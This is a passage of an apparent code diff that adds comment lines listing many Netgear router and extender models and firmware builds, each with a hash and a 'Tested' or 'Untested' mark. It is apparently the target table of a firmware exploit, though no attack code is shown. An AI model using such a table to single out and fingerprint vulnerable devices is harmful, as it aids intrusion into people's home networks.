19e6711c51642615cd8da895bcb4f154 Untested +# R6400 V1.0.1.22_1.0.17 d790c8858dd1968bb0cbac73e7ae049b Untested +# R6400 V1.0.1.20_1.0.16 d8620afd06eb83c41350f490de6792df Tested +# R6400 V1.0.1.18_1.0.15 e98f59224c11fe7b7adbe4d35a2ae024 Untested +# R6400 V1.0.1.12_1.0.11 7541ede9feaa32df1e20b852f7a230a5 Untested +# R6400 V1.0.1.6_1.0.4 83ba47279692268739d82a7edfafc1ec Untested +# R6400 V1.0.0.26_1.0.14 5be5fe81595674f0a11a65982a8cf7e3 Untested +# R6400 V1.0.0.24_1.0.13 aa8531c26e10e4e4e612ea4a3df3f7c6 Untested +# R6400 V1.0.0.20_1.0.11 f320cf859f20f3faab341b47d570740e Untested +# R6400 V1.0.0.14_1.0.8 b66455bd7c21a54682e9987fa662ec35 Untested +# R6400v2 V1.0.4.84_10.0.58 25c0a4081adf5ff142074fd0d8014ac7 Untested +# R6400v2 V1.0.4.82_10.0.57 234bdb2fe2d358fa4dbce974ca98d8b0 Untested +# R6400v2 V1.0.4.78_10.0.55 c7dad31adf2562df42d1b020a56ab630 Untested +# R6400v2 V1.0.3.66_10.0.50 585dedb8fa86d0d8f6a4efb5591c501d Untested +# R6400v2 V1.0.2.66_10.0.48 43d36ce5d516a6121adff6aec8f5a7c7 Untested +# R6400v2 V1.0.2.62_10.0.46 11aa8cceef3708d911cb4b2919fe396a Untested +# R6400v2 V1.0.2.60_10.0.44 4e73683b8cfaaadac6b0c9a2b5fe81d1 Untested +# R6400v2 V1.0.2.56_10.0.42 c0bd191a5c021607b9c4627734943cd5 Untested +# R6400v2 V1.0.2.52_1.0.39 73e31c6da5db634d58245169c430ab4e Untested +# R6400v2 V1.0.2.50_1.0.38 d3a9a3d8d1cad0836ceb36c50eda2dbb Untested +# R6400v2 V1.0.2.46_1.0.36 5ac0b9b42dc3be8f1fe67a4ea50d766e Untested +# R6400v2 V1.0.2.44_1.0.35 a29a8290d6f451aa23db9cc132c8bb13 Untested +# R6400v2 V1.0.2.34_1.0.22 d609534b475f848709b5957bf65853d7 Untested +# R6400v2 V1.0.2.32_1.0.20 791b103a3798b00e844007520f0ef10b Untested +# R6400v2 V1.0.2.14_1.0.7 f707aab369ee4a0358084f8732df4427 Untested +# R6700 V1.0.2.8_10.0.53 0aa39d2e46c1597da2ef91894bb016e2 Untested +# R6700 V1.0.2.6_10.0.52 0a9041cc202ca71633f6fd5b15d621ef Untested +# R6700 V1.0.1.48_10.0.46 f9856946d2b2d60ac72149f3db34bd18 Untested +# R6700 V1.0.1.46_10.0.45 60fbfa7d196f3262b1d5c7f2388815fb Untested +# R6700 V1.0.1.44_10.0.44 b034da1c05b9e0e76d980808457b9f7b Untested +# R6700 V1.0.1.36_10.0.40 361b453523cd68d1d50f9be9e6affab4 Untested +# R6700 V1.0.1.32_10.0.38 346a257676872b5322986dd755a26ba0 Untested +# R6700 V1.0.1.26_10.0.35 d868075504004b20d7788c788a5180b2 Untested +# R6700 V1.0.1.22_10.0.33 66bc7b05ac8c546f7f896a9829f01adf Untested +# R6700 V1.0.1.20_10.0.32 43ae34c752dacb9f842947165115568d Untested +# R6700 V1.0.1.16_10.0.30 56e60ce42c6b4eb204e5c192a3cc7021 Untested +# R6700 V1.0.1.14_10.0.29 1f8d3fbcc6e12424692ad371fd895b34 Untested +# R6700 V1.0.0.26_10.0.26 e57c70b7d76855b8df473a8ecc8d4b2c Untested +# R6700 V1.0.0.24_10.0.18 0a63a44df72c4ad9479df8552c9bdf96 Untested +# R6700 V1.0.0.2_1.0.1 9990354d0687c8cde7f42aa025eec7c2 Untested +# R6700v3 V1.0.4.84_10.0.58 25c0a4081adf5ff142074fd0d8014ac7 Untested +# R6700v3 V1.0.4.82_10.0.57 234bdb2fe2d358fa4dbce974ca98d8b0 Untested +# R6700v3 V1.0.4.78_10.0.55 c7dad31adf2562df42d1b020a56ab630 Untested +# R6700v3 V1.0.3.66_10.0.50 585dedb8fa86d0d8f6a4efb5591c501d Untested +# R6700v3 V1.0.2.66_10.0.48 43d36ce5d516a6121adff6aec8f5a7c7 Untested +# R6700v3 V1.0.2.62_10.0.46 11aa8cceef3708d911cb4b2919fe396a Untested +# R6700v3 V1.0.2.60_10.0.44 4e73683b8cfaaadac6b0c9a2b5fe81d1 Untested +# R6700v3 V1.0.2.56_10.0.42 c0bd191a5c021607b9c4627734943cd5 Untested +# R6700v3 V1.0.2.52_1.0.39 73e31c6da5db634d58245169c430ab4e Untested +# R6900 V1.0.2.8_10.0.38 d81bc8a57b9430527fb706d516eed382 Untested +# R6900 V1.0.2.6_10.0.37 b87b38710ef5977179d503bc9bf66c13 Untested +# R6900 V1.0.2.4_10.0.35 9e79f7b6256d96609a7a461829d8248e Untested +# R6900 V1.0.1.48_10.0.30 8784f761ecd1b354649f6cf8c2c5b99f Untested +# R6900 V1.0.1.46_10.0.29 37400b051afec889ab58b056d5bb3c86 Untested +# R6900 V1.0.1.44_10.0.28 9784f4edd86b697c94acde2276179de3 Untested +# R6900 V1.0.1.34_1.0.24 d01623ce7b7493963aa159a60e07fe19 Untested +# R6900 V1.0.1.28_1.0.21 541352d81d7ce6c70707f858e03d3ad3 Untested +# R6900 V1.0.1.26_1.0.20 acbcba2cf243924e324e07b625d8f6b9 Untested +# R6900 V1.0.1.22_1.0.18 01c44643eb33073d5e6ad845227f798a Untested +# R6900 V1.0.1.20_1.0.17 8c26c3b7f0f24f98acda07da2ccad65e Untested +# R6900 V1.0.1.16_1.0.15 7e599f7ebee500d6f085f531a6f1e934 Untested +# R6900 V1.0.1.14_1.0.14 de1af2d6fdc38f2efa7dc19f71110b77 Untested +# R6900 V1.0.0.4_1.0.10 f7cdbfd458403617025681b9fd545df8 Untested +# R6900 V1.0.0.2_1.0.2 4f1253f17d5892a6ad139b17f8122d95 Untested +# R6900P V1.3.1.64_10.1.36 73230b02c8371d16933b86caea3406c8 Untested +# R6900P V1.3.1.44_10.1.23 c94a81a643471975801c1f65f30fa09e Untested +# R6900P V1.3.1.26_10.1.3 350a0ce80d8448f89821c84c5c24e77a Untested +# R6900P V1.3.0.20_10.1.1 57f68b9174f20c1cb9076e893f7c7e3e Untested +# R6900P V1.3.0.8_1.0.93 72df20b0f868e8fb896dc1c89b2f7c9a Untested +# R6900P V1.2.0.22_1.0.78 89b5c3b5f8f75715b01eca80d8423adc Untested +# R6900P V1.0.1.14_1.0.59 8731b6fcf8aa73adec7175c4fa30d623 Untested +# R6900P V1.0.0.58_1.0.50 d04818c010e0bcfeef910cb8c0bd217e Untested +# R6900P V1.0.0.46_1.0.30 d2f1f602054a8475aebd563d9373c59c Untested +# R7000 V1.0.11.100_10.2.100 f39d1a3be29d903a5de78a876a92f247 Tested +# R7000 V1.0.9.88_10.2.88 1e4a56c9fa6a0b1ddb12c93260aa86b9 Tested +# R7000 V1.0.9.64_10.2.64 2545e4d62fe606c9235301b13fe51c4a Tested +# R7000 V1.0.9.60_10.2.60 0c1face67db74dae80477937e375c90f Tested +# R7000 V1.0.9.42_10.2.44 9db15cdabcb182c5a8c352f4d62240aa Tested +# R7000 V1.0.9.34_10.2.36 0130c6ef44df28825c34998ec1ed9d28 Tested +# R7000 V1.0.9.32_10.2.34 d63cc30511ec16eb22aea2ad4536c482 Untested +# R7000 V1.0.9.28_10.2.32 65fdddb6075d231981d0b0b0b173b957 Untested +# R7000 V1.0.9.26_10.2.31 e7eb90b86b4cf80fc498a3a2a1cde4b6 Tested +# R7000 V1.0.9.18_1.2.27 62f58a3b03d2ffe4da6def29dc57fd62 Tested +# R7000 V1.0.9.14_1.2.25 933a68fd113502dbe5ee5eda56d76c4d Tested +# R7000 V1.0.9.12_1.2.23 0815e4c5d8bf72f3bc8f8a7c3c5151a5 Tested +# R7000 V1.0.9.10_1.2.21 89caf1296fb771f6f710fdaa11b1eee4 Tested +# R7000 V1.0.9.6_1.2.19 5f52c024607204abbe68350fe3da9ff0 Tested +# R7000 V1.0.8.34_1.2.15 f9472bcb1eea80197f98bd33006666a3 Tested +# R7000 V1.0.7.12_1.2.5 20358acc1e6eff39e2d6846e76b24cd8 Untested +# R7000 V1.0.7.10_1.2.3 c555f18db9afc19489e7e986f143d485 Untested +# R7000 V1.0.7.6_1.1.99 0a49104751389366034a7c88f32197b3 Untested +# R7000 V1.0.7.2_1.1.93 6d7d94848a91a3e22ff1654411ba09ae Untested +# R7000 V1.0.5.70_1.1.91 05a4bf0348e03857c7d37910f02f4afe Untested +# R7000 V1.0.5.64_1.1.88 edfa804fcb57d842ae1ea53544fc790d Untested +# R7000 V1.0.4.30_1.1.67 c62491d7b5f5ac6a41d4f25d7a4896e2 Untested +# R7000 V1.0.4.28_1.1.64 60f6118cc800e96ec4156738485a6061 Untested +# R7000 V1.0.4.18_1.1.52 ee82a3fcaf278597ebeb6bd6a7a436ec Untested +# R7000 V1.0.3.80_1.1.38 6575261b06aa8a64242f02461530a0fc Untested +# R7000 V1.0.3.68_1.1.31 d62937f144cbe3cc259d33c70adf1f65 Untested +# R7000 V1.0.3.60_1.1.27 f36cf1c461b50883d5c001f66f06c324 Untested +# R7000 V1.0.3.56_1.1.25 2ad107f27a2d3fa6db7787594a5718cd Untested +# R7000 V1.0.3.24_1.1.20 25d86a5a33cd447aa35120e4fc97ae8e Untested +# R7000 V1.0.2.194_1.0.15 26fb65524fec001d6ff8cc723d0e863a Untested +# R7000 V1.0.2.164_1.0.15 b4b75cd7c7fc736ca8d195de6954cdb0 Untested +# R7000 V1.0.1.22_1.0.15 1e7fbdb154328552e6ae21e106b79d71 Untested +# R7000 V1.0.0.96_1.0.15 2e25aedb619a9e5520bf8ea9a25d06ac Untested +# R7000P V1.3.1.64_10.1.36 73230b02c8371d16933b86caea3406c8 Untested +# R7000P V1.3.1.44_10.1.23 c94a81a643471975801c1f65f30fa09e Untested +# R7000P V1.3.1.26_10.1.3 350a0ce80d8448f89821c84c5c24e77a Untested +# R7000P V1.3.0.20_10.1.1 57f68b9174f20c1cb9076e893f7c7e3e Untested +# R7000P V1.3.0.8_1.0.93 72df20b0f868e8fb896dc1c89b2f7c9a Untested +# R7000P V1.2.0.22_1.0.78 89b5c3b5f8f75715b01eca80d8423adc Untested +# R7000P V1.0.1.14_1.0.59 8731b6fcf8aa73adec7175c4fa30d623 Untested +# R7000P V1.0.0.58_1.0.50 d04818c010e0bcfeef910cb8c0bd217e Untested +# R7000P V1.0.0.56_1.0.45 e9350d724b176c752f1854d0c93d6197 Untested +# R7000P V1.0.0.50_1.0.35 02b57178cbc3c931d3f260a544429481 Untested +# R7000P V1.0.0.46_1.0.30 d2f1f602054a8475aebd563d9373c59c Untested +# R7000P V1.0.0.44_1.0.27 fa0eee5e0992621c67e3e2ba5aa00515 Untested +# R7100LG V1.0.0.52_1.0.6 1c8d51be270d926fae37ccb870eb1e1a Untested +# R7100LG V1.0.0.50_1.0.6 1d7ef2375f5d48946c00c256c68d2c7e Untested +# R7100LG V1.0.0.48_1.0.6 114fd13cefdf17588004e13240b8e1bf Untested +# R7100LG V1.0.0.46_1.0.6 f9debfe64d27d0a4e96e7b6a9108363b Untested +# R7100LG V1.0.0.42_1.0.6 dcb553dfd489154862ac74eba99e7497 Untested +# R7100LG V1.0.0.40_1.0.6 6bf2fa0bbd5afd33358cf5753477907b Untested +# R7100LG V1.0.0.38_1.0.6 ee79ad50639af3c4fff83e1638223dff Untested +# R7100LG V1.0.0.36_1.0.6 1c05d9c779fce01aa42859181382340b Untested +# R7100LG V1.0.0.34_1.0.6 45fc097ce307749679c46d77cde5a6aa Untested +# R7100LG V1.0.0.32_1.0.6 b6adb8bc5262870940b410634305d18b Untested +# R7100LG V1.0.0.30_1.0.6 fb13dc96f7513d2eaef39966b0245c7b Untested +# R7100LG V1.0.0.28_1.0.6 11f8dd187ef5b5bab4976d9292d129fc Untested +# R7100LG V1.0.0.24_1.0.6 26732e7cac019aadb0513625017f384a Untested +# R7300 V1.0.0.74_1.0.29 505ed4f38c41eee6d44f7689f50be393 Untested +# R7300 V1.0.0.70_1.0.25 ae3e7269a0b9d57c970341bcb0429542 Untested +# R7300 V1.0.0.68_1.0.24 2bcde5639accf598265b7177d782476d Untested +# R7300 V1.0.0.62_1.0.21 0fe64444a5449fbc047200473f0f9403 Untested +# R7300 V1.0.0.60_1.0.20 13d0cabc4464b992e1df78eef6f3961f Untested +# R7300 V1.0.0.56_1.0.18 ebbbdf612c711973bbf8794c44a95970 Untested +# R7300 V1.0.0.54_1.0.17 5aa834b74be6bf16397c791c80c15146 Untested +# R7300 V1.0.0.52_1.0.16 95419377446f8733fa675c890ec5f894 Untested +# R7300 V1.0.0.46_1.0.13 7628870b9f553a2e10768f69756a581d Untested +# R7300 V1.0.0.44_1.0.12 83b93e33bfc09a30668aa0fdd23e2854 Untested +# R7300 V1.0.0.32_1.0.6 fcef0ba19d673f34ccef4dc91dc4fa05 Untested +# R7300 V1.0.0.26_1.0.6 92cff1f3477af90d8596377839e2eec5 Untested +# R7850 V1.0.5.48_10.0.4 086770d1439357f850a3112ae8819141 Untested +# R7850 V1.0.4.46_10.0.2 0b0d439985567721303ce85429f9f1fb Untested +# R7850 V1.0.4.42_10.0.1 7154f14e8e52992364b9a46454280843 Untested +# R7900 V1.0.4.22_10.0.44 3068215ef9fae0f5b91f423cf298b551 Untested +# R7900 V1.0.3.18_10.0.42 b9648a3331fe0bc714086aa465407027 Untested +# R7900 V1.0.3.10_10.0.38 9f36b5152658c5fab9524a1d5aca196c Untested +# R7900 V1.0.3.8_10.0.37 f7f345699b491db79d7ce2b13c838941 Untested +# R7900 V1.0.2.16_10.0.32 6ea7c6925906967070fbb149a66a4f06 Untested +# R7900 V1.0.2.10_10.0.29 644585c5d3509fe14d52387e1a8bb7c8 Untested +# R7900 V1.0.1.26_10.0.23 2ce02ded670becb1ddf5f23c883d81ee Untested +# R7900 V1.0.1.18_10.0.20 6f9af2c3b682c45793dcf06788603160 Untested +# R7900 V1.0.1.12_10.0.17 44a17c8063f2750fb13bb47bc3cd570c Untested +# R7900 V1.0.1.8_10.0.14 66c1cbf908e9d665ac80aaf2a03c4d8f Untested +# R7900 V1.0.1.4_10.0.12 6d1186a3d281608fc83936e6c5961145 Untested +# R7900 V1.0.0.10_10.0.7 46ec7fc4c5cdb9c093ff3bfdb4c8075d Untested +# R7900 V1.0.0.8_10.0.5 72b987220f836ba90ba96fc8f3c3e6b8 Untested +# R7900 V1.0.0.6_10.0.4 255ef90a187d7faf01afa62aa2e16844 Untested +# R7900 V1.0.0.2_10.0.1 7b6bd468b060ac4fb17084c20898caa4 Untested +# R8000 V1.0.4.46_10.1.63 da80add1588ea779156ec23b58421a0e Untested +# R8000 V1.0.4.28_10.1.54 a93e7d1ca961c5d381c1c93b8f85168b Untested +# R8000 V1.0.4.18_10.1.49 45d86327a2dbbad50f65d04480bb91fd Untested +# R8000 V1.0.4.12_10.1.46 917d43c1bf1805db4d52ed37d360340f Untested +# R8000 V1.0.4.4_1.1.42 bb306a4634a9f38ef6b44bfb699c64d7 Untested +# R8000 V1.0.4.2_1.1.41 a3ec0994398d09e774fa4f149eece45b Untested +# R8000 V1.0.3.54_1.1.37 e2e236432b7e215af3d410d3fd1e3777 Untested +# R8000 V1.0.3.48_1.1.33 8bf3b8f6e1ee371975a1811174a5fe87 Untested +# R8000 V1.0.3.46_1.1.32 9020713be39ebf9c232ffc0efb02c8fe Untested +# R8000 V1.0.3.36_1.1.25 533e646304c2afa4f626f7f4c7aa404c Untested +# R8000 V1.0.3.32_1.1.21 02dcbb51aea55ff912a28a24f6b9f78b Untested +# R8000 V1.0.3.26_1.1.18 e13536f8d86441eae991067c25d8e22f Untested +# R8000 V1.0.3.4_1.1.2 6de885748d6d20f6b5d8fce7112e8563 Untested +# R8000 V1.0.2.46_1.0.97 5b6484ebe4dc70c4f6e3e2068d999efb Untested +# R8000 V1.0.2.44_1.0.96 6f83c53910438a665cb1077dbcd3365e Untested +# R8000 V1.0.1.16_1.0.74 7d670355315b039002a8cbbb80420b4f Untested +# R8000 V1.0.0.110_1.0.70 ef0078e8e19027cdf9ea19de0c933042 Untested +# R8000 V1.0.0.108_1.0.62 6b3476409b804505b6d50ad6bc7b1225 Untested +# R8000 V1.0.0.102_1.0.45 a01fcda6b67f06fe4c8c89beea8a1346 Untested +# R8000 V1.0.0.100_1.0.44 49c84460fe2f2c8acde4c2a5e644b1c8 Untested +# R8000 V1.0.0.90_1.0.39 3f1ec00fbd5b17bb494a7a7b407b0c4e Untested +# R8000 V1.0.0.76_1.0.32 0d13323ba9174c355b892f5fdc8ad1f4 Untested +# R8000 V1.0.0.74_1.0.31 2ba89ed0267f17111410325af7443e9c Untested +# R8000 V1.0.0.68_1.0.27 444b9d3c9f7c4fd57b88adcc204e5786 Untested +# R8000 V1.0.0.46_1.0.17 00a3ca9d640835bc1522bf778316d085 Untested +# R8300 V1.0.2.130_1.0.99 6e66d0f53dabb26b63b3c51c60e31d29 Tested +# R8300 V1.0.2.128_1.0.97 a1976abe6cfe426c82fd3e77910ae833 Tested +# R8300 V1.0.2.122_1.0.94 9158cf385252ea8803c593a61c25d6b4 Untested +# R8300 V1.0.2.116_1.0.90 379b3d60f766f148f6edd781207021a4 Untested +# R8300 V1.0.2.106_1.0.85 e07b4ac548845360376351088bdbe025 Untested +# R8300 V1.0.2.100_1.0.82 aee8499b7a27150255651be82f68d292 Untested +# R8300 V1.0.2.94_1.0.79 bcfbef70672ec7f5eb191eb362d91827 Untested +# R8300 V1.0.2.86_1.0.75 de6b48ac7b27dbe36b3ab787dfda3c69 Untested +# R8300 V1.0.2.80_1.0.71 fc1acfbaeebc1f377b44597371b0d250 Untested +# R8300 V1.0.2.48_1.0.52 e851c828e338b0877257dd1944f48f95 Untested +# R8500 V1.0.2.130_1.0.99 6e66d0f53dabb26b63b3c51c60e31d29 Untested +# R8500 V1.0.2.128_1.0.97 a1976abe6cfe426c82fd3e77910ae833 Untested +# R8500 V1.0.2.122_1.0.94 9158cf385252ea8803c593a61c25d6b4 Untested +# R8500 V1.0.2.116_1.0.90 379b3d60f766f148f6edd781207021a4 Untested +# R8500 V1.0.2.106_1.0.85 e07b4ac548845360376351088bdbe025 Untested +# R8500 V1.0.2.100_1.0.82 aee8499b7a27150255651be82f68d292 Untested +# R8500 V1.0.2.94_1.0.79 bcfbef70672ec7f5eb191eb362d91827 Untested +# R8500 V1.0.2.86_1.0.75 de6b48ac7b27dbe36b3ab787dfda3c69 Untested +# R8500 V1.0.2.80_1.0.71 fc1acfbaeebc1f377b44597371b0d250 Untested +# R8500 V1.0.2.64_1.0.62 5b4523865713dac322bd857130609ad2 Untested +# R8500 V1.0.2.54_1.0.56 24f96de9380f9de69e12f89d4fa75819 Untested +# R8500 V1.0.2.30_1.0.43 86b0d0a568ac5c96a76caff6fd58aa61 Untested +# R8500 V1.0.2.26_1.0.41 db2cb85f4ebe32a00ed0f363857296bc Untested +# R8500 V1.0.0.56_1.0.28 7ce6e1dc960c18753db2d1e485b89b06 Untested +# R8500 V1.0.0.52_1.0.26 3e38a40d46ab92e4051c75485d1905c2 Untested +# R8500 V1.0.0.42_1.0.23 46bede5c9402a454eb1ae575e7a360e4 Untested +# R8500 V1.0.0.28_1.0.15 94090fe2e24ba7306a2f31633adc9fe7 Tested +# RS400 V1.5.0.34_10.0.33 06d0d64069c01a8097cd872749976d05 Untested +# WGR614v8 V1.2.10_21.0.52 614f89302975403d496b4a0b518aea8a Untested +# WGR614v8 V1.2.10_21.0.52NA 101384d94d7952a544fa2e62ca73e109 Untested +# WGR614v8 V1.1.24_14.0.43 f43f802a97701767f8fa09f1eb0618c6 Untested +# WGR614v8 V1.1.24_14.0.43NA 95a6f676f56eac0bb8b1eebbd07218ac Untested +# WGR614v8 V1.1.2_1.0.23 071d4113f52c9b21b3c910bb28bacb7d Untested +# WGR614v8 V1.1.2_1.0.23NA bd2fb25f2771d63615a8f3b97c969a0e Untested +# WGR614v8 V1.1.11_6.0.36 607bb6c99bf0133f0d01fa514801b849 Untested +# WGR614v8 V1.1.11_6.0.36NA 241628d09640f984584744fb017683c3 Untested +# WGR614v8 V1.1.1_1.0.20NA b6eb6eae0124e9cd22d61adcc38c999a Untested +# WGR614v8 V1.1.20_7.0.37 a3c36fcddb7655a94363cc3b7918496a Untested +# WGR614v8 V1.1.20_7.0.37NA ed0152c3f9cb8bd31c9c166e20cafc4b Untested +# WGR614v9 V1.2.32_43.0.46 fa1c55ad1567fd849ef751d291b892de Untested +# WGR614v9 V1.2.32_43.0.46NA 365476604a6a3d41ea175f10c3dde764 Tested +# WGR614v9 V1.2.30_41.0.44 7118b22c86f91adc51bcf1cb1d6adf6c Untested +# WGR614v9 V1.2.30_41.0.44NA 5aa4fb6075c995ac8ed73872785c78ce Untested +# WGR614v9 V1.2.24_37.0.35 5b911dfea21d8db82724810e2a9158bd Untested +# WGR614v9 V1.2.24_37.0.35NA 82e743338a1e9ef765dc4b3e37fafd9d Untested +# WGR614v9 V1.2.6_18.0.17 62d24aa8be617fd336dea0debb655ae1 Untested +# WGR614v9 V1.2.6_18.0.17NA 523084eb4010f48a0e707a4028a1fe1d Untested +# WGR614v9 V1.2.2_14.0.13 e6a2dbc9c94544c7eed21b237ccfd24f Untested +# WGR614v9 V1.2.2_14.0.13NA 2d8d6c91da01e286af941d53b0941cd8 Untested +# WGR614v9 V1.0.18_8.0.9PT 64676efe72f6af307b828271e6204fc2 Untested +# WGR614v9 V1.0.18_8.0.9NA c2ef52172f626dd54516748218fd86fc Untested +# WGR614v9 V1.0.15_4.0.3 77789a77994b2401784b1401d73d0b9d Untested +# WGR614v9 V1.0.15_4.0.3NA 7a8e000d8d49c9e59c4b1679017a34b2 Untested +# WGR614v9 V1.0.9_1.0.1NA f254181ba5f01c3a995d2196ae14ee80 Untested +# WGR614v10 V1.0.2.66_60.0.90 3ba19173b642c36ab3101c2eba76cffe Untested +# WGR614v10 V1.0.2.66_60.0.90NA 0f59b6e38db90d94d2d13b768a3220a9 Tested +# WGR614v10 V1.0.2.60_60.0.85 1d60611c5c1625d080f3e10e610c2d5f Untested +# WGR614v10 V1.0.2.60_60.0.85NA a025c0436b77becfe914b232bf52ef25 Untested +# WGR614v10 V1.0.2.58_60.0.84NA f80a3eb6d9210cb0de2198779f497193 Untested +# WGR614v10 V1.0.2.54_60.0.82 ab7a9cc1b054ab8ca2109437f3496f52 Untested +# WGR614v10 V1.0.2.54_60.0.82NA 2a458ba9762df0e91aeb7c38d3eb7e23 Untested +# WGR614v10 V1.0.2.26_51.0.59 40d158ee9d77db8630f6404e11ae03f9 Untested +# WGR614v10 V1.0.2.26_51.0.59NA 2e31d2fd814b3bdfe3b0e3f20843d1b9 Untested +# WGR614v10 V1.0.2.18_47.0.52 73aab18a9fc0035ff8c65d444cab5549 Untested +# WGR614v10 V1.0.2.18_47.0.52NA d4d624d349e6f7da73043d71f44a57d5 Untested +# WGT624v4 V2.0.13_2.0.15NA 80fefa297112135ddd81cf1f60f3c751 Tested +# WGT624v4 V2.0.13_2.0.14 cb4f0a9fc4135b33a9cf560c95c97f51 Untested +# WGT624v4 V2.0.13_2.0.14NA f5b5be2c84b1aef8ca53df5fceab272e Untested +# WGT624v4 V2.0.12_2.0.12 fed810d3dc976e06588e6876f96f9259 Untested +# WGT624v4 V2.0.12_2.0.12NA 60a3a0f205a5716818dbdf1975fbb07b Tested +# WGT624v4 V2.0.6_2.0.6NA f96fbceb5289a65edd92f978ee706339 Untested +# WN2500RP V1.0.0.30_1.0.58 07465158c20dba3b49c79d2ad1b9c84a Untested +# WN2500RP V1.0.0.26_1.0.54 96bd8cfd11a618e5a55bd022428782c9 Untested +# WN2500RP V1.0.0.24_1.0.53 242e4d920ff5df57c9d65a238c29ce37 Untested +# WN2500RPv2 V1.0.1.54_1.0.68 14b91d65bae2129cc4b899e720e75703 Untested +# WN2500RPv2 V1.0.1.50_1.0.64 8b0791af9666590e58209fd7e5a16b27 Untested +# WN2500RPv2 V1.0.1.46_1.0.60 b5114bc628d4e9edc10196270d583177 Untested +# WN2500RPv2 V1.0.1.42_1.0.56 44a31a9fb0bedf6c005091ad494f5351 Untested +# WN2500RPv2 V1.0.0.30_1.0.41 80ef4b999eca686146b0b04e6d669373 Untested +# WN3000RP V1.0.2.64_1.1.86 cb7f3d886a25dc7eb9f986beb54db84a Tested +# WN3000RP V1.0.1.36_1.1.47 df4292954de76be0f27025b9d13ce6bb Untested +# WN3000RP V1.0.1.34_1.1.46 71f56fc6e8094749302f527fe82289a2 Untested +# WN3000RP V1.0.1.18_1.1.24 a1c3820bdca75d04162dd7861fb2f86d Tested +# WN3000RP V1.0.0.12_1.0.12 e06626090bdae6ce66cf75ff03808a5e Untested +# WN3100RP V1.0.0.20_1.0.22 7fdba1a377186b9e1998672c2648d79d Untested +# WN3100RP V1.0.0.16_1.0.20 35d8cde0380d205a7fdca505667d85b4 Untested +# WN3100RP V1.0.0.14_1.0.19 ae21c356da1b984b489b8aabce19de7b Untested +# WN3100RP V1.0.0.6_1.0.12 f731689ad01cc5505e3891e6919c5a05 Untested +# WN3500RP V1.0.0.22_1.0.62 c1674d36c57a5de7933135d59383974e Untested +# WN3500RP V1.0.0.20_1.0.60 65d7a5a699c75333693b2cd396034937 Untested +# WN3500RP V1.0.0.18_1.0.59 83df1d146445eb58d09e445cb3249894 Untested +# WN3500RP V1.0.0.16_1.0.58 0bbedd6843907c8fbb64770e8b57ac2d Untested +# WN3500RP V1.0.0.14_1.0.54 7cc46c62a531db3dc0fd4780c0f82838 Untested +# WN3500RP V1.0.0.12_1.0.49 d6d3eb3f36fa4c2a041903bf7d6fd169 Untested +# WNCE3001 V1.0.0.50_1.0.35 059ad6dcebb82e6651096da7a08fc78d Untested +# WNCE3001 V1.0.0.46_1.0.33 94f01f14cf494c5149f6d7beaa9296d7 Untested +# WNCE3001 V1.0.0.44_1.0.32 4bbca14fd0f41a8c5cd6871a128e46ac Untested +# WNCE3001 V1.0.0.38 619dc850fe460613aaa2c6df53c419d2 Untested +# WNDR3300 V1.0.45_1.0.45 03d3251057856d6cac4769ab86b066bf Tested +# WNDR3300 V1.0.45_1.0.45NA 5d07e4a0ea0a970e89f9396aa62dd607 Tested +# WNDR3300 V1.0.29_1.0.29 602f96a6fae5e8d7f4309f4d8e08188d Untested +# WNDR3300 V1.0.29_1.0.29NA d6f3cf64ce4af186d4e32b4e6452faf2 Untested +# WNDR3300 V1.0.27_1.0.27NA 8ec2a57bb32cfc0f037972e7e4de7faf Untested +# WNDR3300 V1.0.26_1.0.26 3de6162f831de47f58d9f5333e55b7ab Untested +# WNDR3300 V1.0.26_1.0.26NA 748179fe0a96b58999b3a159c3e31723 Untested +# WNDR3300 V1.0.23_1.0.23NA 3bb5461c1170a5753dfffc3f640acc2b Untested +# WNDR3300 V1.0.14 cf637815959405a86d006e2ba1bcfb8d Untested +# WNDR3300 V1.0.14NA 3d2ac9332328b0c256e3c733c98f6a52 Tested +# WNDR3300v2 V1.0.0.26_11.0.26NA e835e1eee653616ba95499f599b78e5b Untested +# WNDR3400 V1.0.0.52_20.0.60 80de163495cc5e58b2c2ff897eec5fd6 Tested +# WNDR3400 V1.0.0.50_20.0.59 d11430ae71dbae949d2eb2a9630ccf1a Untested +# WNDR3400 V1.0.0.38_16.0.48 b8c40a4c5186a3db9ce2a9099147e693 Tested +# WNDR3400 V1.0.0.34_15.0.42 040b5ffe8176b9c42d96b2099f9b4ce0 Untested +# WNDR3400v2 V1.0.0.54_1.0.82 9c021309e2c4091fc57df0353e75b549 Tested +# WNDR3400v2 V1.0.0.52_1.0.81 727e32bd4cb10e0b24d9766fe9a227df Untested +# WNDR3400v2 V1.0.0.38_1.0.61 c8e6e4c539f61b3e3eb6ca0539a68858 Untested +# WNDR3400v2 V1.0.0.34_1.0.52 a88e95d61d2d7ff00009cb1120e85fe5 Untested +# WNDR3400v2 V1.0.0.16_1.0.34 6e2f0190e121d60c8ff14a3fbe1f13f1 Tested +# WNDR3400v2 V1.0.0.12_1.0.30 b5b34647f8f8d3ba34e7eb5d9c972135 Untested +# WNDR3400v3 V1.0.1.24_1.0.67 2be19432190609d6bfb02d6c1c47ee75 Tested +# WNDR3400v3 V1.0.1.22_1.0.66 c077e49ec59fc692b030198bf495e3ae Untested +# WNDR3400v3 V1.0.1.18_1.0.63 21bf9c98c100bda9f3c1426c0ac08b8e Untested +# WNDR3400v3 V1.0.1.16_1.0.62 c5df186763e4635396ae951b655dd071 Untested +# WNDR3400v3 V1.0.1.14_1.0.61 7e3e4b4e1d52fbcd7d5e5843f09f0a68 Untested +# WNDR3400v3 V1.0.1.12_1.0.58 41ce43703a3ebae82b57b67bb40c5d82 Untested +# WNDR3400v3 V1.0.1.8_1.0.56 4f5b23803637f7217bd04af851956296 Untested +# WNDR3400v3 V1.0.1.4_1.0.52 1ecf5ef5969f669596c25844eef9d493 Untested +# WNDR3400v3 V1.0.1.2_1.0.51 d5e10eb60169468672f64b018b5de076 Untested +# WNDR3400v3 V1.0.0.48_1.0.48 3a34943e3bb1ca6e1aba397b411f4b8e Untested +# WNDR3400v3 V1.0.0.46_1.0.45 eabecab2f26341257506074a68545c2b Untested +# WNDR3400v3 V1.0.0.38_1.0.40 72e5fd96a04f49a20be668bb0c5f0730 Tested +# WNDR3400v3 V1.0.0.22_1.0.29 a04349703393acb4fa8ca8aea84fa623 Untested +# WNDR3400v3 V1.0.0.20_1.0.28 469df29ef44a9df192be7f19d1480330 Untested +# WNDR3700v3 V1.0.0.42_1.0.33 58e4777d185a193780db166db21d5a04 Tested +# WNDR3700v3 V1.0.0.38_1.0.31 7ba5ac026b6f6682dac17a5ce954a96c Tested +# WNDR3700v3 